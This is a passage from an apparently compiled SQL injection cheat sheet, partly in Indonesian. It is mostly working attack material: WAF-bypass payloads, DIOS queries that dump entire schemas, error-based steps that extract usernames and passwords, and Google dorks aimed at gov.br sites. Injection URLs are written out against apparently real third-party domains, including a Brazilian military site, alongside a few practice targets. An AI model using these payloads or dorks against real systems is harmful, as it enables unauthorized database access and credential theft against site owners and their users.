1259SELECT UTL_INADDR.get_host_name(’10.0.0.1′) FROM dual; — gets hostnames
1260Location of DB files SELECT name FROM V$DATAFILE;
1261Default/System Databases SYSTEM
1262SYSAUX
1263
1264~rkx
1265
1266Basic filter
1267
1268----------------------------
1269
1270*** Comments
1271
1272‘ or 1=1#
1273
1274‘ or 1=1– -
1275
1276‘ or 1=1/* (MySQL < 5.1)
1277
1278' or 1=1;%00
1279
1280' or 1=1 union select 1,2 as `
1281
1282' or#newline
1283
12841='1
1285
1286' or– -newline
1287
12881='1
1289
1290' /*!50000or*/1='1
1291
1292' /*!or*/1='1
1293
1294*** Prefixes
1295
1296+ – ~ !
1297
1298‘ or –+2=- -!!!’2
1299
1300*** Operators
1301
1302^, =, !=, %, /, *, &, &&, |, ||, , >>, <=, <=, ,, XOR, DIV, LIKE, SOUNDS LIKE,
1303
1304RLIKE, REGEXP, LEAST, GREATEST, CAST, CONVERT, IS, IN, NOT, MATCH, AND, OR, BINARY, BETWEEN, ISNULL
1305
1306*** Whitespaces
1307
1308+ %09 %0a %0b %0c %0d %a0 /**/
1309
1310‘or+(1)sounds/**/like“1“–%a0-
1311
1312load_file/*foo*/(0×616263)
1313
13140x82 ( low single comma )
1315
1316%82
1317
1318%uff00 %c0%20 %c0%a0 %e0%80%a0 %u0028 %uff08 %c0( %c0%a8 %e0%80%a8 %u0029 %uff09 %c0) %c0%a9 %e0%80%a9
1319
1320-Ph.h4rh4r
1321
1322FOR POSTGRE 8.4 >
1323
1324(select+array_to_string(array_agg(concat(table_name,'::',column_name)::text),$$%3Cli%3E$$)from+information_schema.columns+where+table_schema+not+in($$informatio​n_schema$$,$$pg_catalog$$))
1325
13262.FOR POSTGRE 9.1>
1327
1328(select+string_agg(concat(table_name,'::',column_name),$$%3Cli%3E$$)from+informa​tion_schema.columns+where+table_schema+not+in($$information_schema$$,$$pg_catalo​g$$))
1329
13303. ALL VERSION
1331(select+array_to_string(array(select+table_name||':::'||column_name::text+from+i​nformation_schema.columns+where+table_schema+not+in($$information_schema$$,$$pg_catalog$$)),'%3Cli%3E'))
1332
13334.
1334'Asero ::: '||version()||'<br>'||(SELECT array_to_string(array(SELECT('===>'||T0ltable_name||' :: '||column_name)::text FROM information_schema.columns where table_schema='public'),'<br>'))
1335
1336~Asero
1337
1338
1339Oracle SQL Injection and DIOS query (Ph.h4rh4r)
1340
1341http://www.site.it/pages.php?p=cut-linear') order by 3--&lang=it
1342
1343No Error
1344
1345http://www.site.it/pages.php?p=cut-linear') order by 4--&lang=it
1346
1347No Error
1348
1349http://www.site.it/pages.php?p=cut-linear') order by 5--&lang=it
1350
1351Error
1352
1353http://www.site.it/pages.php?p=cut-linear') Union All Select NULL,NULL,NULL,NULL from dual--&lang=it
1354
1355ctrl+u (view-source:)
1356
1357view-source:http://www.site.it/pages.php?p=cut-linear') Union All Select '1111',NULL,NULL,NULL from dual--&lang=it
1358
1359view-source:http://www.site.it/pages.php?p=cut-linear') Union All Select NULL,'1111',NULL,NULL from dual--&lang=it
1360
1361view-source:}
1362
1363<meta name="description" content="11111" />
1364
1365<meta name="description" content="1" />
1366
1367}
1368
1369'">'||(select LISTAGG(table_name,'<li>') within group (ORDER BY table_name) from all_tables)||'<!--'
1370
1371(select wm_concat('<li>'||table_name||':'||column_name)from (select rownum as rnum,table_name,column_name from all_tab_columns order by table_name desc) shell where rnum<120)||'<!--'
1372
1373http://www.site.it/pages.php?p=cut-linear') and 1=0 union select null,'">'||(select LISTAGG(table_name,'<li>') within group (ORDER BY table_name) from all_tables)||'<!--' ,NULL,NULL from dual --&lang=it
1374
1375(select banner from v$version where rownum=1)
1376
1377
1378SQL injection using the xml function extractvalue() to extract data (Ph.h4rh4r)
1379
13801 : www.site.com/error.php?id=null and extractvalue(rand(),concat(0x3a,version(),0x3a,user()))--
1381
1382Result:
1383
1384'Xpath syntax error: 5.5.9:user@localhost'
1385
13862 : www.site.com/error.php?id=null and extractvalue(rand(),concat(0x3a,(select concat(0x3c,table_name) from information_schema.tables limit 85,1)))--
1387
1388Result:
1389
1390'Xpath syntax error: :users'
1391
13923 : www.site.com/error.php?id=null and extractvalue(rand(),concat(0x3a,(select concat(0x3a,column_name) from information_schema.columns limit 1050,1)))--
1393
1394Result:
1395
1396'Xpath syntax error: :username'
1397
13984 : www.site.com/error.php?id=null and extractvalue(rand(),concat(0x3a,(select concat(0x3a,column_name) from information_schema.columns limit 1150,1)))--
1399
1400Result:
1401
1402'Xpath syntax error: :password'
1403
14045 : www.site.com/error.php?id=null and extractvalue(rand(),concat(0x3a,(select concat(0x3a,username,0x3a,password) from users)))--
1405
1406Result:
1407
1408'Xpath syntax error: :Admin:password1'
1409
1410OR
1411
14126 : www.site.com/error.php?id=null and extractvalue(rand(),concat(0x3a,(select concat(0x3a,username,0x3a,password) from users limit 1,1)))--
1413
1414Source: GOOGLE.COM
1415
1416Sekarang saya akan menunjukkan bagaimana mem-bypass filter WAF.
1417
1418Sebelum Semua pastikan Anda memiliki pengetahuan dalam SQLi.
1419
1420Ok Mari Mulai ..
1421
1422Apa itu WAF atau Aplikasi Web Firewall>?
1423-A firewall aplikasi web (WAF) adalah alat, plugin server, atau filter yang menerapkan seperangkat aturan ke percakapan HTTP. Umumnya, aturan-aturan ini mencakup serangan umum seperti Cross-site Scripting (XSS) dan SQL Injection. Dengan menyesuaikan aturan untuk aplikasi Anda, banyak serangan dapat diidentifikasi dan diblokir. Upaya untuk melakukan kustomisasi ini dapat menjadi signifikan dan perlu dipertahankan karena aplikasi dimodifikasi.
1424
1425Beberapa situs web menggunakan filter WAF.
1426Jika Anda menemukan situs vuln yang memiliki waf dan Anda mencoba untuk menyuntikkan permintaan berbasis Union dan Pertunjukannya Tidak Dapat Diterima, 403 terlarang atau Aplikasi Web FIrewall ALERT..Itulah berarti permintaan atau sintaks yang disuntikkan adalah Filter atau Diblokir oleh WAF.
1427
1428Ok sekarang inilah beberapa metode untuk Bypass filter WAF.
1429
14301) Komentar:
1431
1432Komentar SQL adalah berkat bagi kita SQL injector. Mereka memungkinkan kita untuk melewati banyak pembatasan firewall aplikasi Web dan untuk membunuh pernyataan SQL tertentu untuk mengeksekusi perintah penyerang saat mengomentari pertanyaan sah yang sebenarnya. Beberapa komentar di SQL:
1433
1434//,? , / ** /, #,? +,? -,;
1435
14362) Mengubah Kasus:
1437
1438Beberapa WAF? S hanya akan menyaring serangan huruf kecil. Seperti yang bisa kita lihat, kita dapat dengan mudah menghindarinya dengan mengubah huruf besar-kecil:
1439Kemungkinan filter Regex:
1440
1441/ union \ sselect / g
1442id = 1 + UnIoN / ** / SeLeCT, atau dengan XSS -> alert (1)
1443
14443) Komentar Inline:
1445
1446Beberapa kata kunci filter WAF seperti / union \ sselect / ig Kita dapat mem-bypass filter ini dengan menggunakan komentar inline sebagian besar waktu, Contoh yang lebih kompleks akan memerlukan pendekatan yang lebih canggih seperti menambahkan kata kunci SQL yang selanjutnya akan memisahkan dua kata:
1447
1448id = 1 / *! UnIoN * / SeLeCT
1449
1450Perhatikan tanda seru / *! Kode * / Tanda seru mengeksekusi pernyataan SQL kami.
1451Komentar sebaris dapat digunakan di seluruh pernyataan SQL sehingga jika table_name atau information_schema disaring, kita dapat menambahkan lebih banyak komentar sebaris. Sebagai contoh, mari kita berpura-pura sebuah situs menyaring serikat, di mana, table_name, table_schema, =, dan information_schema .. Ini adalah 3 pernyataan yang kita perlukan untuk menyuntikkan target kita.
1452Untuk ini kami akan:
1453
1454id = 1 / *! UnIoN * / + SeLeCT + 1,2, concat (/ *! table_name * /) + FrOM /*information_schema*/.tables / *! WHERE * / + / *! TaBlE_ScHeMa * / + like + database ()? -
1455
1456Kode di atas akan melewati filter. Perhatikan kami dapat menggunakan? Suka? bukannya? =?
1457Cara lain untuk menggunakan comemnts inline, ketika semuanya tampak gagal Anda dapat mencoba untuk melalui aplikasi Firewall off dengan menyusun pernyataan SQL menggunakan variabel:
1458
1459id = 1 + UnIoN / * & a = * / SeLeCT / * & a = * / 1,2,3, database ()? -
1460
1461Kode di atas harus melewati Union + pilih filter bahkan ketika komentar inline umum tidak bekerja dengan sendirinya
1462
14634) Buffer Overflow: / Masukan yang tidak terduga:
1464
1465Banyak WAFS ditulis dalam bahasa C yang membuat mereka cenderung meluap atau bertindak berbeda ketika dimuat dengan sekelompok data. Berikut adalah WAF yang melakukan tugasnya dengan benar, tetapi ketika diberikan sejumlah besar Data memungkinkan permintaan dan respons jahat.
1466
1467id = 1 dan (pilih 1) = (Pilih 0xAAAAAAAAAAAAAAAAA 1000 lebih A? s) + UnIoN + SeLeCT + 1,2, versi (), 4,5, database (), gunakan r (), 8,9,10, 11,12,13,14,15,16,17,18,19,20,21,22,23, 24,25,26
1468, 27,28,29,30,31,32,33,34,35,36? +
1469
1470Pemintas ini di atas berfungsi. Saya sendiri baru saja menggunakan ini terhadap situs Web baru-baru ini.
1471
14725) Kata kunci yang diganti (preg_replace dan / atau WAF? S dengan tindakan yang sama
1473
1474Terkadang dan aplikasi akan menghapus semua kata kunci. Sebagai contoh, katakanlah kita memiliki filter yang menggantikan serikat pilih dengan spasi. Kita bisa memotong filter itu seperti ini:
1475
1476id = 1 + UNIunionON + SeLselectECT + 1,2,3?
1477
1478Seperti yang Anda lihat setelah union + select telah dihapus modal kami UNION + SELECT mengambil tempat yang berhasil menyuntikkan permintaan kami:
1479
1480UNION + PILIH + 1,2,3?
1481
14826) Pengkodean karakter:
1483
1484Kebanyakan WAF akan memecahkan kode dan menyaring masukan aplikasi, tetapi beberapa WAF hanya men-decode input sekali sehingga pengkodean ganda dapat melewati filter tertentu karena WAF akan men-decode input sekali kemudian menyaring sementara Aplikasi akan terus mendekode pernyataan SQL mengeksekusi kode kita.
1485Contoh enkode ganda:
1486
1487id = 1% 252f% 252a * / UNION% 252f% 252a / SELECT% 252f% 252a * / 1,2, kata sandi% 252f% 252a * / FROM% 252f% 252a * / Pengguna? +
1488[# Tut By Pain006]
1489
1490©
1491~ h
1492
1493
1494Bypass AQTRONIX WebKnight Filter IIS
1495
1496http://www.site.com?id=1 and (2)=(s%elect convert(int,@@version))
1497
1498http://www.site.com?id=1 and (2)=(s%elect convert(int,DB_N%AME()))
1499
1500sql.php?id=2+un/**/ion+se/**/lect+1,2,3,4
1501
1502sql.php?id=2+un/*%00*/ion+se/*%00*/lect+1,2,3,4,5
1503
1504sql.php?id=2/**/union/**/select/**/1,2,3,4,5
1505
1506sql.php?id=2+union+%0A+select+1,2,3,4,5
1507
1508sql.php?id=2+/*%00*/+union+select+1,2,3,4,5
1509
1510/?a=1+union/*&b=*/select+1,2
1511
1512/?a=1+union/*&b=*/select+1,pass/*&c=*/from+users
1513
1514-Ph.h4rh4r
1515
1516400,403,404,406
1517ERROR BYPASS
1518--------------------
1519
1520%55nion/**/%53elect
1521
1522id=null%0A/**//*!50000%55nIOn*//*yoU*/all/**/%0A/*!%53eLEct*/%0A/*AAA*/+1,2,3--+
1523
1524500
1525ERROR BYPASS
1526--------------------
1527
1528and (select 1)=(Select 0xAA)+UnIoN+SeLeCt+1,2,3--+
1529
1530**NOTE: if you are in IE,and its ASP site,and you get error 500,goto chrome.**
1531
15321064
1533ERROR BYPASS
1534--------------------
1535
1536/**/Union/**/Select/**/
1537
1538uniunionon+selselectect
1539
1540id=(0)union(select(0),version(),(0),(0),(0),(0),(0),(0),(0))
1541
1542if you get error 1064 like:
1543
1544...syntax to use near 'union select 1,2,3,4,5,6,7,8,9' at line 1...
1545
1546its version 3,use this one
1547
1548+or+1+group+by+concat(concat_ws(0x7c,version(),database(),user()),floor(rand(0)*?2))+having+min(0)+or+1--+-
1549
1550
1551Error Based Injection
1552---------------------
1553Error based injection is deployed on databases which is powered by MS-SQL.
1554
1555Database: MY-SQL : PHP
1556MS-SQL : .asp or .aspx
1557
1558Probelm with Error Based Injection for a Hacker
1559-----------------------------------------------
15601. Version() and database() not works!!
1561Solution : @@version
1562
15632. You can not call all the tables from the given database through information_schema.
1564
15653. You cannot extract columns of your target table in a go.
1566
1567Why it is known as Error Based Injection
1568-----------------------------------------
1569It means you will get the data in an error.
1570
1571Target : vulnweb.com : It is practice framework from a company called Acunetix.
1572
1573It has all MY-SQL and MS-SQL technology attack practices.
1574
1575Step 1: Get any GET method in the URL of the website. I.e We have to look for any SOmethoing=Something.
1576http://testasp.vulnweb.com/showforum.asp?id=0
1577
1578Step 2: Check the exception handling.
1579http://testasp.vulnweb.com/showforum.asp?id=0'
1580
1581Step 3: Check the conditions required for further attack.
1582http://testasp.vulnweb.com/showforum.asp?id=0 and 1=0;
1583
1584NOte : Error Based Injection works on LIFO rule. Last in First out.
1585
1586For Example: If we have a database with tables like followings
1587threads -> 1
1588teacher->2
1589classes->3
1590fee->4
1591users->5
1592
1593Step 4: http://testasp.vulnweb.com/showforum.asp?id=0 and
15941=convert(int,(select top 1 table_name from information_schema.tables));
1595
1596Got Table : 'threads' X
1597http://testasp.vulnweb.com/showforum.asp?id=0 and
15981=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('threads')));
1599
1600Target : 'users'
1601
1602Step 5: Get the respective columns of the users table
1603http://testasp.vulnweb.com/showforum.asp?id=0 and
16041=convert(int,(select top 1 column_name from information_schema.columns where table_name='users' and column_name not in ('uname')));
1605
1606Target Column : uname, upass
1607
1608Step 6: Get the uname and upass
1609http://testasp.vulnweb.com/showforum.asp?id=0 and
16101=convert(int,(select top 1 upass from users));
1611
1612uname:admin
1613upass: none
1614
1615~h
1616
1617
1618D I O S B Y P A S S
1619
1620DIOS MRFMR
1621concat(0x494e4a454354204259204d522e464d52,0x3c62723e,/*!00000/*!00000(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,database(),0x3a3a,table_name,0x203a3a20,column_name))))x)*/)
1622
1623DIOS MRFMR WAF
1624/*!00000concat*/(0x3C666F6E7420666163653D224963656C616E6422207374796C653D22636F6C6F723A7265643B746578742D736861646F773A307078203170782035707820233030303B666F6E742D73697A653A33307078223E496E6A6563746564206279204D722E464D5220782054333735344B315431203C2F666F6E743E3C62723E3C62723E3C666F6E7420636F6C6F723D626C61636B2073697A653D353E44622056657273696F6E203A20,version(),0x3c62723e44622055736572203a20,user(),0x3C62723E2053796D203A,@@HAVE_SYMLINK,0x3c62723e3c62723e3c2f666f6e743e3c7461626c6520626f726465723d2231223e3c74686561643e3c74723e3c74683e44617461626173653c2f74683e3c74683e5461626c653c2f74683e3c74683e436f6c756d6e3c2f74683e3c2f74686561643e3c2f74723e3c74626f64793e,(select%20(@x)%20/*!00000from*/%20(select%20(@x:=0x00),(select%20(0)%20/*!00000from*/%20(information_schema/**/.columns)%20where%20(table_schema!=0x696e666f726d6174696f6e5f736368656d61)%20and%20(0x00)%20in%20(@x:=/*!00000concat*/(@x,0x3c74723e3c74643e3c666f6e7420636f6c6f723d7265642073697a653d333e266e6273703b266e6273703b266e6273703b,table_schema,0x266e6273703b266e6273703b3c2f666f6e743e3c2f74643e3c74643e3c666f6e7420636f6c6f723d677265656e2073697a653d333e266e6273703b266e6273703b266e6273703b,table_name,0x266e6273703b266e6273703b3c2f666f6e743e3c2f74643e3c74643e3c666f6e7420636f6c6f723d626c75652073697a653d333e,column_name,0x266e6273703b266e6273703b3c2f666f6e743e3c2f74643e3c2f74723e))))x))
1625
1626DIOS WAF
1627(Select export_set(5,@:=0,(select count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2))
1628
1629DIOS SULE
1630Concat(0x3c43656e7465723e,0x3c466f6e7420436f6c6f723d22526564223e,0x3c62723e,0x3c62723e,0x3c62723e,0x3c62723e,0x4696e6a6563746564206279202e2f53756c6547616e73,0x3c62723e,0x3c62723e,0x566572736920,0x3a,Version(),0x3c62723e,0x446174616261736520,0x3a,Database(),0x3c62723e,0x5573657220,0x3a,User(),@C:=0x00,If((Select+Count(*)+From+Information_Schema.Columns+Where+Table_Schema=Database()+And+@C:=Concat(@C,0x3c62723e,Table_Name,0x3a,Column_Name)),0x00,0x00),@c,0x3c2f466f6e743e,0x3c2f43656e7465723e)
1631
1632DUMP
1633(SELECT(@x)FROM(SELECT(@x:=0x00) ,(SELECT(@x)FROM(namadb.namatable)WHERE(@x)IN(@x:=CONCAT(0x20,@x,username,0x7e,password,0x3c62723e))))x)
1634
1635(/*!50000SELECT(@x*/)/*!50000FROM*/(/*!50000SELECT(@x:=0x00*/) ,(/*!50000SELECT(@x*/)/*!50000FROM*/(miat_web2014.tbladmin)/*!50000WHERE*/(@x)/*!50000IN*/(@x:=/*!50000CONCAT*/(0x20,@x,adminName,0x7e,adminpass,0x3c62723e))))x)
1636
1637LOKOMEDIA
1638'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+
1639
1640DIOS WAF MOD SECURITY
1641/*!50000CONCAT*/(0x3c43656e7465723e,0x496e6a656374696f6e204279204d72765f323331,0x3c62723e,0x3c62723e,version/***/(),0x3c62723e,database/**/(),0x3c62723e,user/**/(),@C:=0x3c62723e,If((/!50000Select*/+Count()+/!50000From*/+/*!50000Information_Schema*/.Columns+/*!50000Where*/+Table_Schema=database/***/()+And+@C:=/!50000CONCAT*/(@C,0x3c62723e,/*!50000Table_Name*/,0x3a,0x3a,0x3a,0x3a,/*!50000Column_Name*/)),0x3a,0x00),@C)
1642
1643~hl
1644
1645
1646Beberapa injector hanya memakai query bypass tanpa menganalisa bagian kata yg di block oleh WAF ( Web Aplication Firewall )
1647
1648Sebelum nya Testing dlu :D
1649
1650kalau Order by ga work . coba pakai group+by :D
1651
1652http://www.webshit.com/vulnscript.php?id=1+order+by+1--+-
1653
1654http://www.webshit.com/vulnscript.php?id=1+group+by+1--+-
1655
1656----------------------------------------
1657
1658http://www.webshit.com/vulnscript.php?id=1+union--+- [waf]
1659
1660http://www.webshit.com/vulnscript.php?id=1+select--+- [No waf]
1661
1662brarti fungsi union di block .
1663kita coba bypass dngan kombinasi Uppercase dan lowercase .
1664
1665http://www.webshit.com/vulnscript.php?id=1+uNiOn--+- [waf Bypassed]
1666
1667atau klo masih kena Waf
1668
1669http://www.webshit.com/vulnscript.php?id=2 /*!uNiOn*/--+-
1670
1671atau
1672
1673http://www.webshit.com/vulnscript.php?id=1+/*!50000uNiOn*/--+-
1674
1675okay bypassed :D
1676
1677-------------------------------------
1678
1679tahap berikut nya Union Select
1680
1681http://www.webshit.com/vulnscript.php?id=1+union--+- [no waf]
1682
1683http://www.webshit.com/vulnscript.php?id=1+select--+- [no waf]
1684
1685tapi saat
1686
1687http://www.webshit.com/vulnscript.php?id=1+union+select--+- [Waf]
1688
1689brarti Waf block kombinasi kata union select ..
1690
1691kita bs bypass dgn
1692
1693http://www.webshit.com/vulnscript.php?id=1+union+distinctROW+select--+-
1694
1695atau
1696
1697http://www.webshit.com/vulnscript.php?id=1+union%23%0aselect--+-
1698
1699yuhuu Bypassed :D
1700
1701---------------------------------------
1702
1703Bypass dengan url Encode jg bs
1704
1705http://www.webshit.com/vulnscript.php?id=1+%75Nion+%73eLect--+-
1706
1707%75 = u
1708%73 = s
1709
1710----------------------------------------
1711
1712http://www.webshit.com/vulnscript.php?id=1+/*!50000union*/ DISTINCTROW /*!50000select*/+1--+- [no waf]
1713
1714http://www.webshit.com/vulnscript.php?id=1+/*!50000union*/ DISTINCTROW /*!50000select*/+1,2--+- [waf]
1715
1716Hmm ketika menambah (,) kena waf , brarti koma harus dibypass :D
1717
1718http://www.webshit.com/vulnscript.php?id=1+/*!50000union*/ DISTINCTROW /*!50000select*/+1,~~2--+- [bypassed]
1719
1720http://www.webshit.com/vulnscript.php?id=1+/*!50000union*/ DISTINCTROW /*!50000select*/+1,~~2,~~3,~~4,~~5--+- [bypassed]
1721
1722atau
1723
1724http://www.webshit.com/vulnscript.php?id=1+uNiOn(/**_**/(seLeCt(1),(2),(3),(4),(5))-- - [bypassed]
1725
1726atau dgn method join :v
1727
1728----------------------------------------
1729
1730beberapa injector menggunakan UnionOnOn / informationmation_schema_schema tnpa tau maksud query itu :p
1731
1732oke skrang kita cari tau :v
1733
1734live target :
1735
1736http://zixem.altervista.org/SQLi/level3.php?item=3'+union--+-
1737
1738hasil :
1739
1740You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'uni-- -'' at line 1
1741
1742dari situ kita bs liat kalau "on" pada "union" hilang :v
1743
1744bagaimana bypass nya ??
1745
1746tambahin aja on di union nya jadi unionon :v
1747
1748http://zixem.altervista.org/SQLi/level3.php?item=3'+unionon--+-
1749
1750wokee bypassed :D
1751
1752selanjutnya sperti biasa
1753
1754http://zixem.altervista.org/SQLi/level3.php?item=3%27+and+0+unionon+select+concat(%27versailles%20::%20%27,version()),2,4,5--+-
1755
1756###############################
1757Alternativ bypass union select jika langkah diatas blm bs bypass .
1758
1759uni<>on sel<>ect
1760
1761uni*on sel*ect
1762
1763(uni)(on) (sel)(ect)
1764
1765uni[]on sel[]ect
1766
1767uni\on sel\ect
1768###############################
1769
1770Thanks
1771
1772
1773
1774SQLI Tutorial - Beginners
1775
1776http://www.ikar.ru/eng/research.php?id=1+and+1=0+union+select+1,2,concat(Login,0x3a,Password,0x3a,Status),4,5+FROM+Users+limit+0,1
1777
1778http://www.njgsca.org/blog.php?id=-1+union+select+1,username,3,4,5,6,7%20from%20users
1779
1780-h
1781
1782SQL INJECTION BYPASSES TRICKS :)
1783
17841-?name=Thomas'%20GROUP%20BY%20100%20asc%23
1785
17862-?name=Thomas'-%20.1GROUP%20BY%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100%20asc%23
1787
17883-?name=Thomas'- .1/*!50000group*/%23aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
1789aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
1790aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
1791aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
1792aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
1793aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
1794aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
1795aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
1796aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
1797aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
1798aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
1799aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
1800aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%0aby --+%0A100;%00
1801
18024-?name=Thomas'- .1INTO @%60
18034,1-?name=Thomas'- .1INTO @,@%60
18044,2-?name=Thomas'- .1INTO @,@,@--
18054,3-?name=Thomas'- .1INTO @,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@
1806,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@
1807,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@ ;%00
1808
18095-?name=Thomas'- .1/*!50000group*//*** ^ ***/By --+%0A100;%00
1810
18116-?name=Thomas'orderby100--- (let me know if you get normal error here no waf)
1812
1813Retrieving Columns By Using PROCEDURE ANALYSE()
1814
18157-?name=Thomas' PROCEDURE ANALYSE() Get the first column's name
18167,1-?name=Thomas' LIMIT 1,1 PROCEDURE ANALYSE() Get the second column's name
18177,2-?name=Thomas' LIMIT 2,1 PROCEDURE ANALYSE() Get the third column's name
1818
18198-?name=Thomas',0;--+;%00 <<< Play Here With Zero Number >>> 0;--+;%00
1820
18210;--+;%00
18221;--+;%00
18232;--+;%00
1824
1825ETC.
1826
18279-?name=Thomas'%0D%0Aorder%0D%0Aby 100--
1828
182910-?name=Thomas'%0Bgroup%0Bby%0A1,2%23
1830
183111-?name=Thomas'/*!50000union*/-- (let me know if you get normal error here no waf)
1832
183312-?name=Thomas' or .0union/**/distinctrow%23GearFourthBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB%0aselect/**/distinctrow-1--
1834
183513-?name=Thomas'%23GearFourthBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB%0aunion-- (let me know if you get normal error here no waf)
1836
183714-?name=Thomas'%20And .0UnIOn--%20-%0ASeLe%43t-1--
1838
183915?name=Thomas'%75%6e%69%6f%6e--%20-%0%73%65%6c%65%63%74-1--
1840
184116-?name=Thomas'||!{f`id`}union-- a%0Aselect@--
1842
184317-?name=Thomas'||!{f`id`}/*!00000union*/-- (let me know if you get normal error here no waf)
1844
184518-?name=LlRob21hcydHcm95cCBieSAxMDAtLSAt (let me know what happen here)
1846
1847-rkx
1848
1849CATEGORIES: SQL INJECTION
1850
1851inurl:"gov.br" & inurl:"id=" & intext:"warning: mysql_fetch_assoc()
1852
1853inurl:"gov.br" & inurl:"id=" & intext:"warning: mysql_fetch_array()
1854
1855inurl:"gov.br" & inurl:"id=" & intext:"warning: mysql_num_rows()
1856
1857inurl:"gov.br" & inurl:"id=" & intext:"warning: session_start()
1858
1859inurl:"gov.br" & inurl:"id=" & intext:"warning: getimagesize()
1860
1861inurl:"gov.br" & inurl:"id=" & intext:"warning: is_writable()
1862
1863inurl:"gov.br" & inurl:"id=" & intext:"warning: unknown()
1864
1865inurl:"gov.br" & inurl:"id=" & intext:"warning: mysql_result()
1866
1867inurl:"gov.br" & inurl:"id=" & intext:"warning: pg_exec()
1868
1869inurl:"gov.
1870
1871You can change the domain what ever you want :)
1872
1873-h
1874
1875INTERBASE - FIREBIRDSQL
1876
1877http://www.hca.aer.mil.br/externo/index.php?pag=noticias/exibir_noticias.php?id=361/**/and/**/1=user
1878
1879http://www.hca.aer.mil.br/externo/index.php?pag=noticias/exibir_noticias.php?id=361/**/and/**/1=(select/**/first/**/1/**/rdb$field_name/**/from/**/rdb$relation_fields)--
1880
1881http://www.infomedia.by/image.php?operator=2)+and+1=2+union+select+rdb$field_name,2+from+rdb$relation_fields -
1882
1883http://www.infomedia.by/image.php?operator=2)+and+1=(select+first+1+rdb$relation_name+from+rdb$relation_fields) -
1884
1885http://www.infomedia.by/image.php?operator=2)+and+1=(select+first+1+distinct+rdb$relation_name+from+rdb$relations+where+rdb$system_flag=0) -
1886
1887http://www.infomedia.by/image.php?operator=2)+and+1=(select+first+1+skip+n+distinct+rdb$relation_name+from+rdb$relations+where+rdb$system_flag=0) -
1888http://www.infomedia.by/image.php?operator=2)+and+1=(select+first+1+skip+n+rdb$field_name+from+rdb$relation_fields+where+rdb$system_flag=0+and+rdb$relation_name=ascii_char(83)||ascii_char(85)||ascii_char(66)||ascii_char(83)) -
1889
1890http://www.infomedia.by/image.php?operator=2)+and+1=(select+first+1+skip+0+distinct+cast(id||name+as+char(777))+from+autor) -
1891
1892http://www.infomedia.by/image.php?operator=2)+and+substring((select+first+1+rdb$relation_name+from+rdb$relation_fields)+from+n+for+1)!=ascii_char(63)+and+(1=1))
1893
1894http://www.ppc4all.com/category.php?cat=(select+first+1+user+from+rdb$relation_fields)
1895
1896
1897rdb$relation_name - name of the table
1898rdb$system_flag - belong to the system table (a good way of screening, 1 = System)
